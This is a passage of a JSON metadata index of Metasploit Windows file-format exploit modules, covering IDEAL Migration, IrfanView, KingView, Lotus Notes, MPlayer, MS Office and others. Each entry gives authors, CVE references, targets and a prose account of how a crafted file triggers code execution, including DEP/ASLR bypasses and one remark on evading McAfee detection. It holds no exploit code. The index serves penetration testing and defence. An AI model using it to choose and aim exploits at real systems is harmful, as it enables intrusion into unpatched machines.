"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/icofx_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/icofx_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ideal_migration_ipj": {
"name": "PointDev IDEAL Migration Buffer Overflow",
"full_name": "exploit/windows/fileformat/ideal_migration_ipj",
"rank": 500,
"disclosure_date": "2009-12-05",
"type": "exploit",
"author": [
"Dr_IDE",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in versions v9.7\n through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n IDEAL Migration. All versions are suspected to be vulnerable.\n By creating a specially crafted ipj file, an attacker may be able\n to execute arbitrary code.\n\n NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH",
"references": [
"CVE-2009-4265",
"OSVDB-60681",
"EDB-10319",
"EDB-12403",
"EDB-12404",
"EDB-12540"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IDEAL Migration <= 4.5.1 on Windows XP",
"IDEAL Administration <= 10.5 on Windows XP"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ideal_migration_ipj",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/iftp_schedule_bof": {
"name": "i-FTP Schedule Buffer Overflow",
"full_name": "exploit/windows/fileformat/iftp_schedule_bof",
"rank": 300,
"disclosure_date": "2014-11-06",
"type": "exploit",
"author": [
"metacom",
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n i-Ftp v2.20, caused by a long time value set for scheduled download.\n\n By persuading the victim to place a specially-crafted Schedule.xml file\n in the i-FTP folder, a remote attacker could execute arbitrary code on\n the system or cause the application to crash. This module has been\n tested successfully on Windows XP SP3.",
"references": [
"EDB-35177",
"OSVDB-114279"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/iftp_schedule_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/iftp_schedule_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/irfanview_jpeg2000_bof": {
"name": "Irfanview JPEG2000 jp2 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/irfanview_jpeg2000_bof",
"rank": 300,
"disclosure_date": "2012-01-16",
"type": "exploit",
"author": [
"Parvez Anwar <parvez@greyhathacker.net>",
"mr_me <steventhomasseeley@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has\n been tested on a specific version of irfanview (v4.3.2), although other\n versions may work also. The vulnerability is triggered via parsing an\n invalid qcd chunk structure and specifying a malformed qcd size and\n data.\n\n Payload delivery and vulnerability trigger can be executed in multiple\n ways. The user can double click the file, use the file dialog, open via\n the icon and drag/drop the file into Irfanview's window. An egg hunter\n is used for stability.",
"references": [
"CVE-2012-0897",
"OSVDB-78333",
"BID-51426",
"URL-http://www.greyhathacker.net/?p=525"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Irfanview 4.32 / Plugins 4.32 / Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/irfanview_jpeg2000_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ispvm_xcf_ispxcf": {
"name": "Lattice Semiconductor ispVM System XCF File Handling Overflow",
"full_name": "exploit/windows/fileformat/ispvm_xcf_ispxcf",
"rank": 300,
"disclosure_date": "2012-05-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way\n ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially\n crafted file, when a long value is supplied for the version attribute of the ispXCF\n tag. It results in arbitrary code execution under the context of the user.",
"references": [
"OSVDB-82000",
"BID-53562",
"URL-http://secunia.com/advisories/48740/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ispvm_xcf_ispxcf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/kingview_kingmess_kvl": {
"name": "KingView Log File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/kingview_kingmess_kvl",
"rank": 300,
"disclosure_date": "2012-11-20",
"type": "exploit",
"author": [
"Lucas Apa",
"Carlos Mario Penagos Hollman",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in KingView <= 6.55. It exists in\n the KingMess.exe application when handling log files, due to the insecure usage of\n sprintf. This module uses a malformed .kvl file which must be opened by the victim\n via the KingMess.exe application, through the 'Browse Log Files' option. The module\n has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over\n Windows XP SP3.",
"references": [
"CVE-2012-4711",
"OSVDB-89690",
"BID-57909",
"URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/kingview_kingmess_kvl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/lattice_pac_bof": {
"name": "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
"full_name": "exploit/windows/fileformat/lattice_pac_bof",
"rank": 300,
"disclosure_date": "2012-05-16",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer\n 6.21. As a .pac file, when supplying a long string of data to the 'value' field\n under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption\n on the stack, which results in arbitrary code execution under the context of the\n user.",
"references": [
"CVE-2012-2915",
"OSVDB-82001",
"EDB-19006",
"BID-53566",
"URL-http://secunia.com/advisories/48741"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PAC-Designer 6.21 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/lattice_pac_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/lattice_pac_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/lotusnotes_lzh": {
"name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)",
"full_name": "exploit/windows/fileformat/lotusnotes_lzh",
"rank": 400,
"disclosure_date": "2011-05-24",
"type": "exploit",
"author": [
"binaryhouse.net",
"alino <26alino@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered by binaryhouse.net.",
"references": [
"CVE-2011-1213",
"OSVDB-72706",
"BID-48018",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904",
"URL-http://www.ibm.com/support/docview.wss?uid=swg21500034"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal",
"Lotus Notes 8.5.2 FP2 / Windows Universal / DEP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/lotusnotes_lzh.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/lotusnotes_lzh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/magix_musikmaker_16_mmm": {
"name": "Magix Musik Maker 16 .mmm Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/magix_musikmaker_16_mmm",
"rank": 400,
"disclosure_date": "2011-04-26",
"type": "exploit",
"author": [
"acidgen",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Magix Musik Maker 16.\n When opening a specially crafted arrangement file (.mmm) in the application, an\n unsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and\n might require up to several seconds to receive a shell.",
"references": [
"OSVDB-72063",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-002"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal DEP & ASLR Bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/magix_musikmaker_16_mmm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mcafee_hercules_deletesnapshot": {
"name": "McAfee Remediation Client ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/mcafee_hercules_deletesnapshot",
"rank": 100,
"disclosure_date": "2008-08-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When\n sending an overly long string to the DeleteSnapshot() method\n of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.\n This control is not marked safe for scripting, so choose your attack vector accordingly.",
"references": [
"OSVDB-94540",
"EDB-16639"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mcafee_showreport_exec": {
"name": "McAfee SaaS MyCioScan ShowReport Remote Command Execution",
"full_name": "exploit/windows/fileformat/mcafee_showreport_exec",
"rank": 300,
"disclosure_date": "2012-01-12",
"type": "exploit",
"author": [
"rgod",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in McAfee Security-as-a-Service.\n The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails\n to check the FileName argument, and passes it on to a ShellExecuteW() function,\n therefore allowing an attacker to execute any process that's on the\n local system. However, if the victim machine is connected to a remote share\n (or something similar), then it's also possible to execute arbitrary code.\n Please note that a custom template is required for the payload, because the\n default Metasploit template is detectable by McAfee -- any Windows binary, such\n as calc.exe or notepad.exe, should bypass McAfee fine.",
"references": [
"OSVDB-78310",
"BID-51397",
"ZDI-12-012"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Internet Explorer"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mcafee_showreport_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mediacoder_m3u": {
"name": "MediaCoder .M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/mediacoder_m3u",
"rank": 300,
"disclosure_date": "2013-06-24",
"type": "exploit",
"author": [
"metacom",
"modpr0be <modpr0be@spentera.com>",
"otoy <otoy@spentera.com>"
],
"description": "This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability\n occurs when adding an .m3u file, allowing arbitrary code execution under the context\n of the user. DEP bypass via ROP is supported on Windows 7, since MediaCoder\n runs with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539\n to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.",
"references": [
"CVE-2017-8869",
"OSVDB-94522",
"EDB-26403"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/fileformat/mediacoder_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mediacoder_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mediajukebox": {
"name": "Media Jukebox 8.0.400 Buffer Overflow (SEH)",
"full_name": "exploit/windows/fileformat/mediajukebox",
"rank": 300,
"disclosure_date": "2009-07-01",
"type": "exploit",
"author": [
"Ron Henry <rlh@ciphermonk.net>",
"dijital1"
],
"description": "This module exploits a stack buffer overflow in Media Jukebox 8.0.400\n by creating a specially crafted m3u or pls file.",
"references": [
"OSVDB-55924",
"CVE-2009-2650"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 - English",
"Windows XP SP2 - English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mediajukebox.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mediajukebox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/microp_mppl": {
"name": "MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/microp_mppl",
"rank": 500,
"disclosure_date": "2010-08-23",
"type": "exploit",
"author": [
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based\n buffer overflow occurs when the content of a .mppl file gets copied onto the stack,\n which overwrites the lpFileName parameter of a CreateFileA() function, and results in\n arbitrary code execution under the context of the user.",
"references": [
"CVE-2010-5299",
"OSVDB-73627",
"EDB-14720"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Vista / 7"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/microp_mppl.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/microp_mppl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/microsoft_windows_contact": {
"name": "Microsoft Windows Contact File Format Arbitrary Code Execution",
"full_name": "exploit/windows/fileformat/microsoft_windows_contact",
"rank": 300,
"disclosure_date": "2019-01-17",
"type": "exploit",
"author": [
"John Page (aka hyp3rlinx)",
"Brenner Little"
],
"description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of the <c:Url> node parameter of \".contact\" files, which is expected to hold a website value; however, if an attacker references an\n executable file it will run that file without warning instead of performing the expected web navigation. This is dangerous and would be unexpected to an end user.\n Executable files can live in a sub-directory, so when the \".contact\" website link is clicked it traverses directories towards the executable and runs it.\n Making matters worse, if the files are compressed and then downloaded, the \"mark of the web\" (MOTW) may not work as expected with certain archive utilities.\n The \".\\\" chars allow directory traversal to occur in order to run the attacker-supplied executable sitting unseen in the attacker's directory.\n This advisory is a duplicate of an issue that currently affects Windows .VCF files, and is released for the sake of completeness as it affects Windows .contact files as well.",
"references": [
"EDB-46188",
"URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt",
"ZDI-19-013"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2019-04-10 17:17:50 +0000",
"path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/microsoft_windows_contact",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/millenium_mp3_pls": {
"name": "Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/millenium_mp3_pls",
"rank": 500,
"disclosure_date": "2009-07-30",
"type": "exploit",
"author": [
"Molotov",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n An attacker must send the file to the victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.\n This functionality has not been tested in this module.",
"references": [
"OSVDB-56574",
"EDB-9618",
"EDB-10240"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/millenium_mp3_pls",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mini_stream_pls_bof": {
"name": "Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/mini_stream_pls_bof",
"rank": 500,
"disclosure_date": "2010-07-16",
"type": "exploit",
"author": [
"Madjix",
"Tiago Henriques",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow found in Mini-Stream RM-MP3\n Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim\n opens the malicious PLS file.",
"references": [
"CVE-2010-5081",
"OSVDB-78078",
"EDB-14373",
"BID-34514"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30"
],
"mod_time": "2018-07-09 13:22:08 +0000",
"path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mini_stream_pls_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mjm_coreplayer2011_s3m": {
"name": "MJM Core Player 2011 .s3m Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/mjm_coreplayer2011_s3m",
"rank": 400,
"disclosure_date": "2011-04-30",
"type": "exploit",
"author": [
"rick2600",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in MJM Core Player 2011.\n When opening a malicious s3m file in this application, a stack buffer overflow can be\n triggered, resulting in arbitrary code execution.\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
"references": [
"OSVDB-72101",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-004"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal Generic DEP & ASLR Bypass"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mjm_coreplayer2011_s3m",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mjm_quickplayer_s3m": {
"name": "MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/mjm_quickplayer_s3m",
"rank": 400,
"disclosure_date": "2011-04-30",
"type": "exploit",
"author": [
"rick2600",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in MJM QuickPlayer 1.00 beta 60a\n and QuickPlayer 2010 (Multi-target exploit). When opening a malicious s3m file in\n one of these 2 applications, a stack buffer overflow can be triggered, resulting in\n arbitrary code execution.\n\n This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.",
"references": [
"OSVDB-72102",
"URL-http://www.corelan.be/advisories.php?id=CORELAN-11-003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal Generic DEP & ASLR Bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mjm_quickplayer_s3m",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/moxa_mediadbplayback": {
"name": "MOXA MediaDBPlayback ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/moxa_mediadbplayback",
"rank": 200,
"disclosure_date": "2010-10-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When\n sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-4742",
"OSVDB-68986",
"URL-http://www.moxa.com"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/moxa_mediadbplayback",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mplayer_m3u_bof": {
"name": "MPlayer Lite M3U Buffer Overflow",
"full_name": "exploit/windows/fileformat/mplayer_m3u_bof",
"rank": 200,
"disclosure_date": "2011-03-19",
"type": "exploit",
"author": [
"C4SS!0 and h1ch4m",
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n MPlayer Lite r33064, caused by improper bounds checking of a URL entry.\n\n By persuading the victim to open a specially-crafted .M3U file, specifically by\n drag-and-dropping it to the player, a remote attacker can execute arbitrary\n code on the system.",
"references": [
"BID-46926",
"EDB-17013",
"URL-http://www.mplayer-ww.com/eng/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 (DEP Bypass) / MPlayer Lite r33064"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mplayer_m3u_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mplayer_sami_bof": {
"name": "MPlayer SAMI Subtitle File Buffer Overflow",
"full_name": "exploit/windows/fileformat/mplayer_sami_bof",
"rank": 300,
"disclosure_date": "2011-05-19",
"type": "exploit",
"author": [
"Jacques Louw",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow found in the handling\n of SAMI subtitle files in MPlayer SVN Versions before 33471. It currently\n targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.\n\n The overflow is triggered when an unsuspecting victim opens a movie file first,\n followed by loading the malicious SAMI subtitle file from the GUI. Or, it can also\n be done from the console with the MPlayer \"-sub\" option.",
"references": [
"BID-49149",
"OSVDB-74604",
"URL-http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mplayer_sami_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms09_067_excel_featheader": {
"name": "MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability",
"full_name": "exploit/windows/fileformat/ms09_067_excel_featheader",
"rank": 400,
"disclosure_date": "2009-11-10",
"type": "exploit",
"author": [
"Sean Larsson",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the handling of the FEATHEADER record\n by Microsoft Excel. Revisions of Office XP and later prior to the release of the\n MS09-067 bulletin are vulnerable.\n\n When processing a FEATHEADER (Shared Feature) record, Microsoft used a data\n structure from the file to calculate a pointer offset without doing proper\n validation. Attacker supplied data is then used to calculate the location of an\n object, and in turn a virtual function call. This results in arbitrary code\n execution.\n\n NOTE: On some versions of Office, the user will need to dismiss a warning dialog\n prior to the payload executing.",
"references": [
"CVE-2009-3129",
"OSVDB-59860",
"MSB-MS09-067",
"BID-36945",
"ZDI-09-083",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English",
"Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English",
"Microsoft Office 2003 SP0 English on Windows XP SP3 English",
"Microsoft Office 2007 SP2 English on Windows XP SP3 English",
"Crash Target for Debugging"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms09_067_excel_featheader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms10_004_textbytesatom": {
"name": "MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms10_004_textbytesatom",
"rank": 400,
"disclosure_date": "2010-02-09",
"type": "exploit",
"author": [
"SkD",
"Snake",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow vulnerability in the handling of\n the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,\n the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as\n Office 2004 for Mac, are vulnerable.\n\n NOTE: The vulnerable code path is not reachable on versions of Windows prior to\n Windows Vista.",
"references": [
"CVE-2010-0033",
"OSVDB-62241",
"MSB-MS10-004",
"ZDI-10-017"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft PowerPoint Viewer 2003",
"Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3",
"Microsoft PowerPoint Viewer 2003 (kb969615)",
"Crash Target for Debugging"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms10_004_textbytesatom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms10_038_excel_obj_bof": {
"name": "MS10-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow",
"full_name": "exploit/windows/fileformat/ms10_038_excel_obj_bof",
"rank": 300,
"disclosure_date": "2010-06-08",
"type": "exploit",
"author": [
"Nicolas Joly",
"Shahin Ramezany <shahin@abysssec.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.\n By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker\n can get the control of the execution flow. This results in arbitrary code execution under\n the context of the user.",
"references": [
"CVE-2010-0822",
"OSVDB-65236",
"BID-40520",
"MSB-MS10-038",
"URL-https://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3",
"Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms10_038_excel_obj_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms10_087_rtf_pfragments_bof": {
"name": "MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",
"full_name": "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof",
"rank": 500,
"disclosure_date": "2010-11-09",
"type": "exploit",
"author": [
"wushi of team509",
"unknown",
"jduck <jduck@metasploit.com>",
